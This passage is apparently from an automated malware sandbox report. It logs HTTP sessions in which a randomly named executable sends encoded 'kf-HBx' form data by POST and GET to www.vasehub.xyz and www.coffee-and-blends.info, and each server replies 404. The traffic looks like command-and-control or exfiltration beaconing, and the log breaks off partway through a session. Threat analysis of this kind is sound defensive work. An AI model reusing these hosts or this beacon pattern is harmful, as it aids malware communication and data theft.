                                                                                                                                  Data Ascii: kf-HBx=4zYQckirOMbOUqbHo9Di8PaK+6rzVg3TqjVeYGCnFRPaKlVBzF7JdzDRZFgQQoD/cTqRgKHZdFXjCc6ffo1Q5BukdhV63lDzPjRtGXkCvDFiK8rViddjlWd11LhxFQp9UxxYELHBjk7NPL9DckbbyONA802ZCy8lGnTuOY1I4pebZP1kmqCO4hWPh6FCIgZ7rQ==
                                                                                                                                  Oct 24, 2024 08:02:42.002927065 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 24 Oct 2024 06:02:41 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Content-Length: 389
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  14192.168.2.449967162.213.249.216801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:02:43.846467972 CEST807OUTPOST /rhgo/ HTTP/1.1
                                                                                                                                  Host: www.vasehub.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.vasehub.xyz
                                                                                                                                  Referer: http://www.vasehub.xyz/rhgo/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 223
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 34 7a 59 51 63 6b 69 72 4f 4d 62 4f 46 36 4c 48 70 61 76 69 35 76 61 4a 78 61 72 7a 62 41 33 58 71 6a 52 65 59 48 32 52 46 6e 58 61 4b 45 6c 42 30 45 37 4a 59 7a 44 52 52 6c 67 52 65 49 44 68 63 54 58 6b 67 4f 48 5a 64 46 72 6a 43 65 69 66 66 62 64 50 32 78 75 6d 53 42 56 38 71 31 44 7a 50 6a 52 74 47 55 5a 6e 76 44 64 69 4b 4e 62 56 6a 2f 35 67 37 47 64 36 79 4c 68 78 53 41 70 78 55 78 77 39 45 49 44 72 6a 6d 44 4e 50 4b 4e 44 4e 52 76 59 37 4f 4e 43 34 30 33 4c 48 77 64 35 65 46 69 67 4a 62 52 72 77 4a 4b 45 59 4a 6b 2b 33 62 6a 5a 71 68 79 38 38 39 4d 32 46 6a 6b 79 77 61 47 77 75 33 6f 64 30 44 42 72 33 79 6e 49 4a 68 56 36 56 31 6b 3d
                                                                                                                                  Data Ascii: kf-HBx=4zYQckirOMbOF6LHpavi5vaJxarzbA3XqjReYH2RFnXaKElB0E7JYzDRRlgReIDhcTXkgOHZdFrjCeiffbdP2xumSBV8q1DzPjRtGUZnvDdiKNbVj/5g7Gd6yLhxSApxUxw9EIDrjmDNPKNDNRvY7ONC403LHwd5eFigJbRrwJKEYJk+3bjZqhy889M2FjkywaGwu3od0DBr3ynIJhV6V1k=
                                                                                                                                  Oct 24, 2024 08:02:44.565080881 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 24 Oct 2024 06:02:44 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Content-Length: 389
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  15192.168.2.449978162.213.249.216801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:02:47.123435974 CEST10889OUTPOST /rhgo/ HTTP/1.1
                                                                                                                                  Host: www.vasehub.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.vasehub.xyz
                                                                                                                                  Referer: http://www.vasehub.xyz/rhgo/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 10303
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 34 7a 59 51 63 6b 69 72 4f 4d 62 4f 46 36 4c 48 70 61 76 69 35 76 61 4a 78 61 72 7a 62 41 33 58 71 6a 52 65 59 48 32 52 46 6e 76 61 4b 32 74 42 30 6e 6a 4a 62 7a 44 52 4f 56 67 55 65 49 43 6b 63 54 50 6f 67 4f 4c 76 64 41 76 6a 51 72 2b 66 5a 71 64 50 74 42 75 6d 51 42 56 35 33 6c 43 72 50 6a 41 6d 47 55 4a 6e 76 44 64 69 4b 4f 54 56 6b 74 64 67 35 47 64 31 31 4c 68 44 46 51 6f 6b 55 78 5a 41 45 4c 76 52 6a 56 4c 4e 4d 70 6c 44 65 48 44 59 6d 2b 4e 45 31 55 32 4f 48 77 52 51 65 46 75 61 4a 61 31 52 77 4c 57 45 5a 2b 4a 57 75 49 6a 6d 6f 53 79 7a 70 39 52 63 4b 68 55 38 38 5a 65 57 2f 33 30 6a 67 43 78 44 73 31 53 64 63 77 39 6c 4c 51 5a 71 56 73 36 43 54 39 55 64 69 6e 6e 47 39 59 4c 37 63 79 69 43 73 35 38 69 63 70 4c 72 69 44 37 70 58 67 4b 52 44 6a 70 69 6a 53 76 67 78 51 36 7a 36 67 7a 35 37 53 77 6d 4a 56 35 31 79 55 7a 44 55 6e 75 6f 39 68 4c 34 32 68 7a 5a 61 65 6c 66 37 58 79 4b 67 39 49 79 32 69 74 70 45 49 77 55 39 59 62 57 36 66 50 54 36 37 6b 66 37 43 66 37 63 61 78 [TRUNCATED]
                                                                                                                                  Data Ascii: kf-HBx=4zYQckirOMbOF6LHpavi5vaJxarzbA3XqjReYH2RFnvaK2tB0njJbzDROVgUeICkcTPogOLvdAvjQr+fZqdPtBumQBV53lCrPjAmGUJnvDdiKOTVktdg5Gd11LhDFQokUxZAELvRjVLNMplDeHDYm+NE1U2OHwRQeFuaJa1RwLWEZ+JWuIjmoSyzp9RcKhU88ZeW/30jgCxDs1Sdcw9lLQZqVs6CT9UdinnG9YL7cyiCs58icpLriD7pXgKRDjpijSvgxQ6z6gz57SwmJV51yUzDUnuo9hL42hzZaelf7XyKg9Iy2itpEIwU9YbW6fPT67kf7Cf7cax8mE8I4PdfnXOX4Fhu44TdjlixBWAvziHIozz0A5BO7BnSHtIqt7hndKLnC/ZJGQk9Ugwf82IZinrfsBKw0MzJ2s0xV62CH6iGDvNvzfGLG5G4AGKbjZMunbt2Tbg4pYGhwOIIL44gdDhoh5WDpgFvSlZQEVdiRyyS1LS7J/ohnJcTVZ4LJEjwq2yiKH/5uDXy9HXE63JxIBmfM2oJavxVbdWrNCuZT/YbEkme84uanAjRe3ALQe6yWGUOzc28FRRPgNmVgKNu5dJuzBaz6mCZS0f1UIsuC1eMf9C1OMvopBCOvRC0oxZGqhJmhVhcLEKGeGeCTMUEFnTbQJw6w/LE4ivj8+DZ/sqNf35rMJhS6YKN+wEzvihRQEzVHECyz+s4R2eMEcPG3ANRBZs4WOUBJ1eNA3zInO720cJ1molLMzTozJyptiH+mOVI/90quZ6H101+zSgod49gEzA/aZaBCOl+2whhlH+HbdKHM2Ka5D8w8w67T1b3tXJW7VRNkWN1wWhg8UIlZp8PXUUIU/IglQKm4TeRl043CoAQCYOY9BfeZqYoo7XxwJvDNAFECSOxHQgjNPyxhHHntTaQVZj7HKpkRDNkZ8mLXA9usxD2QQy4sJx00nvSvuaMOeRb+qC5q1li7AtNKCixCElOuub6PaAbjnJTpqF4S [TRUNCATED]
                                                                                                                                  Oct 24, 2024 08:02:47.805632114 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 24 Oct 2024 06:02:47 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Content-Length: 389
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  16192.168.2.449994162.213.249.216801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:02:49.668462038 CEST520OUTGET /rhgo/?kf-HBx=1xwwfRv/EtrSMau8qPeCsOf3wKLyTBnoq21AcW2zPWj0G3ZAwmXkdhytTHgnTqC6RVKy1Kv2PAT+a+qucbh6tBLzZBRYsir7YQhsB0BKwkYVMNCqueBTujA=&oFA=_z5x9B5 HTTP/1.1
                                                                                                                                  Host: www.vasehub.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Oct 24, 2024 08:02:50.352365971 CEST548INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 24 Oct 2024 06:02:50 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Content-Length: 389
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  17192.168.2.450024217.160.0.231801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:02:55.446274996 CEST820OUTPOST /jp2s/ HTTP/1.1
                                                                                                                                  Host: www.coffee-and-blends.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.coffee-and-blends.info
                                                                                                                                  Referer: http://www.coffee-and-blends.info/jp2s/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 203
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 43 32 43 6d 34 6d 76 46 79 67 58 34 75 68 50 45 35 34 44 72 2f 73 66 6b 78 55 4c 56 35 63 6b 51 66 79 64 47 66 75 6f 73 77 78 47 6a 4f 33 77 66 62 65 64 70 46 53 6f 69 39 73 49 48 4a 2f 4c 35 4c 7a 63 4d 4e 36 68 6e 38 58 6b 6c 59 79 63 74 64 38 2f 37 7a 38 73 61 4b 34 44 47 49 66 38 2b 67 4f 54 4c 32 31 57 74 6c 6c 55 68 79 78 42 4b 52 78 39 4b 49 53 38 36 48 70 31 4d 6b 76 44 46 73 4d 54 48 38 44 43 45 41 6d 35 6d 74 39 66 4d 49 50 64 44 37 48 4e 44 6c 55 30 75 58 36 79 42 4d 74 7a 6e 54 4c 7a 44 70 52 6c 41 56 55 63 7a 36 58 72 35 6a 79 53 4b 4b 38 4b 54 5a 43 45 6c 35 51 3d 3d
                                                                                                                                  Data Ascii: kf-HBx=C2Cm4mvFygX4uhPE54Dr/sfkxULV5ckQfydGfuoswxGjO3wfbedpFSoi9sIHJ/L5LzcMN6hn8XklYyctd8/7z8saK4DGIf8+gOTL21WtllUhyxBKRx9KIS86Hp1MkvDFsMTH8DCEAm5mt9fMIPdD7HNDlU0uX6yBMtznTLzDpRlAVUcz6Xr5jySKK8KTZCEl5Q==
                                                                                                                                  Oct 24, 2024 08:02:56.273010015 CEST779INHTTP/1.1 404 Not Found
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Date: Thu, 24 Oct 2024 06:02:56 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  X-Frame-Options: deny
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                                                                                                                  Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  18192.168.2.450025217.160.0.231801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:02:57.987793922 CEST840OUTPOST /jp2s/ HTTP/1.1
                                                                                                                                  Host: www.coffee-and-blends.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.coffee-and-blends.info
                                                                                                                                  Referer: http://www.coffee-and-blends.info/jp2s/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 223
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 43 32 43 6d 34 6d 76 46 79 67 58 34 38 52 2f 45 70 72 72 72 6f 63 66 6a 30 55 4c 56 33 38 6c 34 66 79 5a 47 66 72 49 38 77 44 79 6a 50 57 41 66 56 2f 64 70 4a 79 6f 69 6c 63 4a 50 55 50 4c 6e 4c 7a 41 75 4e 37 4e 6e 38 58 77 6c 59 7a 73 74 61 4e 2f 34 77 4d 73 63 4d 34 44 45 56 76 38 2b 67 4f 54 4c 32 31 43 48 6c 6d 6b 68 79 46 46 4b 51 54 56 4a 54 79 38 37 4f 4a 31 4d 76 50 44 4a 73 4d 53 53 38 47 61 2b 41 6b 78 6d 74 2f 58 4d 4a 65 64 41 78 48 4e 46 36 45 31 62 52 50 66 77 4f 4e 6d 78 51 4c 76 32 6f 53 59 6d 5a 79 4e 70 72 6d 4b 75 78 79 32 35 58 37 44 6e 55 42 35 73 69 62 59 66 45 43 57 42 57 50 73 41 4e 2b 4d 4f 57 54 79 71 4b 77 6b 3d
                                                                                                                                  Data Ascii: kf-HBx=C2Cm4mvFygX48R/Eprrrocfj0ULV38l4fyZGfrI8wDyjPWAfV/dpJyoilcJPUPLnLzAuN7Nn8XwlYzstaN/4wMscM4DEVv8+gOTL21CHlmkhyFFKQTVJTy87OJ1MvPDJsMSS8Ga+Akxmt/XMJedAxHNF6E1bRPfwONmxQLv2oSYmZyNprmKuxy25X7DnUB5sibYfECWBWPsAN+MOWTyqKwk=
                                                                                                                                  Oct 24, 2024 08:02:58.821497917 CEST779INHTTP/1.1 404 Not Found
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Date: Thu, 24 Oct 2024 06:02:58 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  X-Frame-Options: deny
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 [TRUNCATED]
                                                                                                                                  Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  19192.168.2.450026217.160.0.231801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:03:00.537065983 CEST10922OUTPOST /jp2s/ HTTP/1.1
                                                                                                                                  Host: www.coffee-and-blends.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.coffee-and-blends.info
                                                                                                                                  Referer: http://www.coffee-and-blends.info/jp2s/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 10303
